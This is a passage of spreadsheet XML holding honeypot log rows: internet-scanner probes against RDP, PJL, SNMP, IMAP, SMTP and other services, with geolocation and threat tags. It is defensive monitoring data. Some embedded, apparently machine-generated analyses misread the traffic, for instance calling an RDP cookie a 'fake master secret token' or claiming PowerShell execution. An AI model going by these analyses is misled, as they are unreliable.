mstshash=MRnbsFdhx'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=sxDdlK'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=pfXRCv'}}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'CAPA'}}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1', 'version': '1'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'User-Agent': 'Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers&amp;#39; presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_POSTGRES:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:cdd2:1f17"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <s v="No log data provided, unable to analyze malicious activity. &amp;&amp; An attempt to use TLS encryption during FTP authentication, possibly indicative of an unauthorized access attempt or malware scanning activity. This could be related to an attacker trying to establish a secure connection for malicious purposes. Further investigation is needed to determine the intent behind this action. &amp;&amp; Possible malicious activity involves an unauthorized attempt to establish a secure connection (TLS) during the AUTH command of a file transfer service, suggesting a potential exploitation attempt or brute-force login attempt. This indicates someone is trying to connect securely but may not have legitimate access. It could be part of a larger attack pattern. &amp;&amp; Malicious actors are attempting to access Microsoft SQL Server database, suggesting a potential exploitation of a vulnerability or brute force attack attempt. _x000a_This could be indicative of a larger cyber attack aimed at gaining unauthorized access to sensitive data. _x000a_The lack of authentication information (NA) suggests the attacker is likely using automated tools or brute force methods to gain access."/>
    <s v="There doesn't seem to be any log data provided. Could you please provide the actual log data from the honeypot so I can assist with analyzing it? &amp;&amp; FTP TLS Auth &amp;&amp; Tls Auth Bypass"/>
  </r>
  <r>
    <x v="11"/>
    <x v="11"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T23:11:44"/>
    <d v="2023-12-03T09:16:00"/>
    <d v="2025-04-30T23:11:44"/>
    <n v="495"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:mail']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTP_H2&amp;&amp;SMA-LAB_RDP_H45&amp;&amp;SMA-LAB_SNMP_H16&amp;&amp;SMA-LAB_SOCKS5_H30&amp;&amp;SMA-LAB_SOCKS5_H37&amp;&amp;SMA-LAB_LDAP_H10&amp;&amp;SMA-LAB_MYSQL_H44&amp;&amp;SMA-LAB_RDP_H39&amp;&amp;SMA-LAB_PJL_H41&amp;&amp;SMA-LAB_PJL_H30&amp;&amp;SMA-LAB_NTP_H38&amp;&amp;SMA-LAB_IMAP_H23&amp;&amp;SMA-LAB_FTP_H40&amp;&amp;SMA-LAB_IMAP_H37&amp;&amp;SMA-LAB_IMAP_H25&amp;&amp;SMA-LAB_REDIS_H32&amp;&amp;SMA-LAB_IMAP_H17&amp;&amp;SMA-LAB_MYSQL_H37&amp;&amp;SMA-LAB_REDIS_H44&amp;&amp;SMA-LAB_SNMP_H26&amp;&amp;SMA-LAB_MT-CPA_H46&amp;&amp;SMA-LAB_IMAP_H41&amp;&amp;SMA-LAB_POP3_H27&amp;&amp;SMA-LAB_IRC_H18&amp;&amp;SMA-LAB_IRC_H7&amp;&amp;SMA-LAB_RDP_H19&amp;&amp;SMA-LAB_MT-CPA_H36&amp;&amp;SMA-LAB_FTP_H16&amp;&amp;SMA-LAB_MT-CPA_H47&amp;&amp;SMA-LAB_IMAP_H19&amp;&amp;SMA-LAB_MYSQL_H26&amp;&amp;SMA-LAB_SOCKS5_H46&amp;&amp;SMA-LAB_IMAP_H45&amp;&amp;SMA-LAB_LDAP_H5&amp;&amp;SMA-LAB_FTP_H19&amp;&amp;SMA-LAB_IMAP_H28&amp;&amp;SMA-LAB_VNC_H12&amp;&amp;SMA-LAB_LDAP_H25&amp;&amp;SMA-LAB_ORACLE_H23&amp;&amp;SMA-LAB_REDIS_H34&amp;&amp;SMA-LAB_REDIS_H11&amp;&amp;SMA-LAB_IMAP_H16&amp;&amp;SMA-LAB_IMAP_H44&amp;&amp;SMA-LAB_VNC_H19&amp;&amp;SMA-LAB_IMAP_HC1&amp;&amp;SMA-LAB_ORACLE_H46&amp;&amp;SMA-LAB_SNMP_H45&amp;&amp;SMA-LAB_MYSQL_H12&amp;&amp;SMA-LAB_IMAP_H11&amp;&amp;SMA-LAB_ORACLE_H19&amp;&amp;SMA-LAB_POP3_H21&amp;&amp;SMA-LAB_NTP_H19&amp;&amp;SMA-LAB_IMAP_H27&amp;&amp;SMA-LAB_SOCKS5_H31&amp;&amp;SMA-LAB_FTP_H35&amp;&amp;SMA-LAB_ORACLE_H25&amp;&amp;SMA-LAB_SIP_H36&amp;&amp;SMA-LAB_FTP_H47&amp;&amp;SMA-LAB_FTP_H44&amp;&amp;SMA-LAB_SOCKS5_H18&amp;&amp;SMA-LAB_MT-CPA_H35&amp;&amp;SMA-LAB_PJL_H46&amp;&amp;SMA-LAB_SIP_H6&amp;&amp;SMA-LAB_POP3_H4&amp;&amp;SMA-LAB_MYSQL_H19&amp;&amp;SMA-LAB_MYSQL_H10&amp;&amp;SMA-LAB_MYSQL_H34&amp;&amp;SMA-LAB_SNMP_H27&amp;&amp;SMA-LAB_LDAP_H13&amp;&amp;SMA-LAB_SNMP_H32&amp;&amp;SMA-LAB_POSTGRES_H22"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;80&amp;&amp;3389&amp;&amp;161&amp;&amp;1080&amp;&amp;3306&amp;&amp;9100&amp;&amp;NA&amp;&amp;143&amp;&amp;21&amp;&amp;6379&amp;&amp;9231&amp;&amp;110&amp;&amp;6667&amp;&amp;56378&amp;&amp;50845&amp;&amp;5900&amp;&amp;1521&amp;&amp;60524&amp;&amp;5432&amp;&amp;389&amp;&amp;23&amp;&amp;50598&amp;&amp;1433&amp;&amp;52675&amp;&amp;445&amp;&amp;54215&amp;&amp;57048&amp;&amp;55319&amp;&amp;51107&amp;&amp;49804&amp;&amp;54086&amp;&amp;56283"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="True"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="CA"/>
    <s v="California"/>
    <s v="Santa Clara"/>
    <s v="Santa Clara"/>
    <s v="5393015"/>
    <s v="95054"/>
    <s v="37.3835"/>
    <s v="-121.983"/>
    <s v="396982"/>
    <s v="Google LLC"/>
    <s v="Google LLC"/>
    <s v="hosting"/>
    <s v="Palo Alto Networks, Inc"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="query&amp;&amp;connection&amp;&amp;command&amp;&amp;stshash&amp;&amp;NA&amp;&amp;GET&amp;&amp;request"/>
    <s v="NA&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1', 'version': '1'}}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_SNMP:NA}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1.1.1.0', 'version': '0'}}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'CAPA'}}&amp;&amp;{Data_LDAP:NA}&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=nsAKbEcCS'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=WvVHxp'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=orzmxV'}}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_SOCKS5:NA}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=jDAUYtDRr'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=uQFeBL'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=WWPBAu'}}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'a001'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'User-Agent': 'Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers&amp;#39; presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=oroigugHy'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=SrttIc'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=PKRSQK'}}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_VNC:NA}&amp;&amp;{Data_SIP:NA}&amp;&amp;{Data_IRC:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.50,63886)}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.50,63890)}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.50,63906)}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.50,57484)}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.50,57488)}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.50,57500)}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.50,62928)}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.50,62930)}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.50,62946)}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.50,60748)}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.50,60760)}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.50,60766)}&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_NTP:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=FMzYSfonP'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=JVbUsK'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=JHSiZf'}}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.50,61246)}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.50,61250)}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.50,61258)}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=xnvtOqwtT'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:cdd2:1f32"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <s v="The attacker is attempting to brute force and scan various network services, likely searching for vulnerabilities or open ports to exploit. They are also trying to gather information about the systems, such as user credentials, software versions, and system configurations. &amp;&amp; The attackers are attempting to scan and exploit vulnerabilities in various network services, including DHCP, DNS, FTP, HTTP, HTTPS, IMAP, IPP, IRC, LDAP, MSSQL, MYSQL, NTP, Oracle, PJL, POP3, RDP, REDIS, SIP, SMB, SMTP, SNMP, and SOCKS5. They are likely trying to gain unauthorized access to these services or steal sensitive information. &amp;&amp; Attempted access to Oracle database detected, likely a brute force attack or exploit of vulnerabilities in the database management system. Database credentials may have been compromised or attempts made to gain unauthorized access. Further investigation is needed to determine the full scope of the incident. &amp;&amp; This log indicates a potential brute-force attack on a POP3 email service as no activity is reported, suggesting an attempt to gain unauthorized access by attempting multiple login attempts. The lack of login credentials in the log suggests the attacker was likely testing combinations. &amp;&amp; Malicious activity is detected where an attacker attempts to authenticate with a fake master secret token (mstshash) sent in the 'Cookie' header. This could be a brute-force attack or an attempt to bypass authentication mechanisms. The goal is likely to gain unauthorized access to remote services. &amp;&amp; The data suggests an attempt to execute a PowerShell command using the MSTSH protocol, which is often used by attackers to maintain persistence on compromised systems. This can be indicative of a malicious actor attempting to establish a remote access tool or backdoor connection. The presence of this activity may indicate a potential insider threat or lateral movement."/>
    <s v="Port scanning and information gathering &amp;&amp;  Port scanning and exploitation &amp;&amp; POP3 Scanning &amp;&amp; Rdp Bruteforce &amp;&amp; RDP Bruteforce"/>
  </r>
  <r>
    <x v="12"/>
    <x v="12"/>
    <s v="NA&amp;&amp;sh-ams-nl-gp1-wk141b.internet-census.org"/>
    <x v="0"/>
    <d v="2025-04-30T23:11:30"/>
    <d v="2024-02-15T08:13:01"/>
    <d v="2025-04-30T23:11:30"/>
    <n v="678"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:mail'&amp;&amp; 'attack-target:ssh']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Session-termination-event"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_REDIS_H39&amp;&amp;SMA-LAB_SNMP_H37&amp;&amp;SMA-LAB_SIP_H37&amp;&amp;SMA-LAB_HTTPS_H38&amp;&amp;SMA-LAB_HTTPS_H4&amp;&amp;SMA-LAB_LDAP_H29&amp;&amp;SMA-LAB_POSTGRES_H19&amp;&amp;SMA-LAB_MT-CPA_H6&amp;&amp;SMA-LAB_POP3_H45&amp;&amp;SMA-LAB_SNMP_H8&amp;&amp;SMA-LAB_REDIS_H2&amp;&amp;SMA-LAB_PJL_H32&amp;&amp;SMA-LAB_HTTPS_H2&amp;&amp;SMA-LAB_LDAP_HC1&amp;&amp;SMA-LAB_PJL_H33&amp;&amp;SMA-LAB_POSTGRES_H18&amp;&amp;SMA-LAB_HTTPS_H12&amp;&amp;SMA-LAB_RDP_H15&amp;&amp;SMA-LAB_POSTGRES_H24&amp;&amp;SMA-LAB_IMAP_H24&amp;&amp;SMA-LAB_IMAP_H22"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;6379&amp;&amp;161&amp;&amp;NA&amp;&amp;443&amp;&amp;389&amp;&amp;5432&amp;&amp;40238&amp;&amp;110&amp;&amp;9100&amp;&amp;3389&amp;&amp;143&amp;&amp;23&amp;&amp;3306&amp;&amp;6667&amp;&amp;1521&amp;&amp;21"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']&amp;&amp; 'dnsbl-2.uceprotect.net': ['unknown']&amp;&amp; 'dnsbl-3.uceprotect.net': ['unknown']}"/>
    <n v="108"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="NL"/>
    <s v="The Netherlands"/>
    <s v="NH"/>
    <s v="North Holland"/>
    <s v="Gemeente Amsterdam"/>
    <s v="Amsterdam"/>
    <s v="2759794"/>
    <s v="1012"/>
    <s v="52.3676"/>
    <s v="4.90414"/>
    <s v="211680"/>
    <s v="NSEC - Sistemas Informaticos, S.A."/>
    <s v="NSEC - Sistemas Informaticos, S.A."/>
    <s v="business"/>
    <s v="Inap AMS"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="command&amp;&amp;connection&amp;&amp;query&amp;&amp;NA&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'NFHB0'}}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS_x000d__x000a_@PJL INFO ID_x000d__x000a_@PJL INFO PRODINFO_x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000d__x000a_Host: 38.54.42.176:9100_x000d__x000a_User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36 _x000d__x000a_Accept: */*_x000d__x000a_Accept-Encoding: gzip_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_LDAP:NA}&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'MPJL0'}}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000d__x000a_Host: 149.102.153.168:9100_x000d__x000a_User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36 _x000d__x000a_Accept: */*_x000d__x000a_Accept-Encoding: gzip_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': 'SSH-2.0-Go_x000d__x000a_'}}&amp;&amp;{Data_IRC:NA}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS_x000d__x000a_@PJL INFO ID_x000d__x000a_@PJL INFO PRODINFO_x000d__x000a_'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '94.131.97.67', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000d__x000a_Host: 156.244.8.69:9100_x000d__x000a_User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36 _x000d__x000a_Accept: */*_x000d__x000a_Accept-Encoding: gzip_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': 'SSH-2.0-Go_x000d__x000a_'}}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'QUIT'}}&amp;&amp;{Data_FTP:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:2d9c:805c"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low&amp;&amp;High"/>
    <s v="The attacker is scanning for open ports and testing services on various protocols, likely trying to identify vulnerabilities or gain unauthorized access to systems. They are also attempting to authenticate with different credentials across multiple services. &amp;&amp; The attacker is attempting to scan and enumerate services on the target system, likely as part of a reconnaissance phase. They are trying various protocols and methods to gain access or gather information about the system's configuration, users, and vulnerabilities. &amp;&amp;  &amp;&amp; There is insufficient information to analyze. &amp;&amp; The user disconnected from the POP3 service abruptly, suggesting a potential reconnaissance or scanning activity._x000a_The QUIT command was issued without any previous actions, which could indicate an attempt to gather information about the service._x000a_This behavior is often seen in pre-attack reconnaissance. &amp;&amp; There is insufficient information to analyze any potential malicious activity. &amp;&amp; No log data provided, so there's nothing to analyze or explain. &amp;&amp; This indicates an attempt by an attacker to access a device's job list, potentially as part of a reconnaissance or exploitation effort._x000a_The attacker may be trying to gather information about the system or its services for future attacks._x000a_This could be a precursor to further malicious activity."/>
    <s v="  &amp;&amp;  &amp;&amp;  &amp;&amp; Scanning Attack"/>
  </r>
  <r>
    <x v="13"/>
    <x v="13"/>
    <s v="acclaimed.monitoring.internet-measurement.com&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-30T23:11:10"/>
    <d v="2023-07-25T12:04:55"/>
    <d v="2025-04-30T23:11:10"/>
    <n v="1391"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:mail'&amp;&amp; 'attack-target:sip']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Remote Fingerprinting Activity&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Encryption Misuse"/>
    <s v="low"/>
    <s v="&amp;&amp;SMA-LAB_POSTGRES_H17&amp;&amp;SMA-LAB_PJL_H10&amp;&amp;SMA-LAB_REDIS_H21&amp;&amp;SMA-LAB_IMAP_H31&amp;&amp;SMA-LAB_REDIS_H19&amp;&amp;SMA-LAB_ORACLE_H5&amp;&amp;SMA-LAB_REDIS_H34&amp;&amp;SMA-LAB_IMAP_H35&amp;&amp;SMA-LAB_SOCKS5_H3&amp;&amp;SMA-LAB_REDIS_H7&amp;&amp;SMA-LAB_REDIS_H45&amp;&amp;SMA-LAB_SMB_H29&amp;&amp;SMA-LAB_REDIS_H32&amp;&amp;SMA-LAB_FTP_H40&amp;&amp;SMA-LAB_REDIS_H36&amp;&amp;SMA-LAB_ORACLE_H18&amp;&amp;SMA-LAB_SIP_H38&amp;&amp;SMA-LAB_SOCKS5_H12&amp;&amp;SMA-LAB_REDIS_H22&amp;&amp;SMA-LAB_REDIS_H27&amp;&amp;SMA-LAB_POSTGRES_H11&amp;&amp;SMA-LAB_REDIS_H24&amp;&amp;SMA-LAB_REDIS_H13&amp;&amp;SMA-LAB_POSTGRES_H26&amp;&amp;SMA-LAB_PJL_H7&amp;&amp;SMA-LAB_RDP_H4&amp;&amp;SMA-LAB_REDIS_H23&amp;&amp;SMA-LAB_SIP_H29&amp;&amp;SMA-LAB_REDIS_H38&amp;&amp;SMA-LAB_REDIS_H18&amp;&amp;SMA-LAB_MYSQL_H13&amp;&amp;SMA-LAB_SOCKS5_H31&amp;&amp;SMA-LAB_POSTGRES_H40&amp;&amp;SMA-LAB_SOCKS5_H36&amp;&amp;SMA-LAB_REDIS_HC1&amp;&amp;SMA-LAB_REDIS_H5&amp;&amp;SMA-LAB_POSTGRES_H6&amp;&amp;SMA-LAB_POSTGRES_H13&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_LDAP_H2&amp;&amp;SMA-LAB_PJL_H13&amp;&amp;SMA-LAB_SOCKS5_H46&amp;&amp;SMA-LAB_SOCKS5_H16&amp;&amp;SMA-LAB_REDIS_H33&amp;&amp;SMA-LAB_POP3_H30"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;5432&amp;&amp;445&amp;&amp;6379&amp;&amp;110&amp;&amp;23&amp;&amp;9100&amp;&amp;143&amp;&amp;1521&amp;&amp;1080&amp;&amp;NA&amp;&amp;3389&amp;&amp;3306&amp;&amp;6667&amp;&amp;443&amp;&amp;21&amp;&amp;389&amp;&amp;59371&amp;&amp;49583&amp;&amp;25"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="True"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="GB"/>
    <s v="United Kingdom"/>
    <s v="ENG"/>
    <s v="England"/>
    <s v="Leeds"/>
    <s v="Leeds"/>
    <s v="2644688"/>
    <s v="LS1"/>
    <s v="53.8008"/>
    <s v="-1.54908"/>
    <s v="211298"/>
    <s v="Driftnet Ltd"/>
    <s v="Driftnet Ltd"/>
    <s v="hosting"/>
    <s v="Constantine Cybersecurity LTD"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="command&amp;&amp;connection&amp;&amp;query&amp;&amp;GET&amp;&amp;NA&amp;&amp;stshash&amp;&amp;request"/>
    <s v="NA&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'QUIT'}}&amp;&amp;{Data_SOCKS5:NA}&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_IRC:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '38.54.79.122', 'User-Agent': 'Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_FTP:{'args': '()', 'cmd': 'HELP'}}&amp;&amp;{Data_FTP:{'args': '()', 'cmd': 'SYST'}}&amp;&amp;{Data_FTP:{'args': '()', 'cmd': 'FEAT'}}&amp;&amp;{Data_FTP:{'args': '()', 'cmd': 'QUIT'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_IRC:{'command': 'HELP', 'params': '[]', 'prefix': ''}}&amp;&amp;{Data_LDAP:NA}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'CAPA'}}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'a001'}}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_SMB:Incoming connection (87.236.176.84,47259)}&amp;&amp;{Data_SMB:Incoming connection (87.236.176.84,35919)}&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=eltons'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000d__x000a_Host: 193.57.138.110:9100_x000d__x000a_User-Agent: Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)_x000d__x000a_Connection: close_x000d__x000a_Accept: */*_x000d__x000a_Accept-Encoding: gzip_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_SIP:NA}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': 'uotjgfzx', 'content-length': '0', 'cseq': '1 OPTIONS', 'from': 'sip:87.236.176.84;tag=uotjgfzx', 'max-forwards': '0', 'to': 'sip:95.164.118.29', 'via': 'SIP/2.0/UDP 87.236.176.84:5060;branch=z9hG4bKuotjgfzx;received=87.236.176.84;rport=49756'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '38.54.117.64', 'User-Agent': 'Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_SMTP:NA}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'STARTTLS', 'data': 'None'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:57ec:b054"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low&amp;&amp;Medium"/>
    <s v="No log data provided, therefore unable to analyze or describe any possible malicious activity. &amp;&amp; No log data provided. &amp;&amp; There is insufficient information to analyze any potential malicious activity._x000a__x000a_Activity description: Unknown or unavailable, no logs provided for analysis."/>
    <s v="There is no log data provided to analyze. Please provide the actual log data for me to identify the types of attacks."/>
  </r>
  <r>
    <x v="14"/>
    <x v="14"/>
    <s v="NA&amp;&amp;sh-ams-nl-gp1-wk141c.internet-census.org"/>
    <x v="0"/>
    <d v="2025-04-30T23:10:54"/>
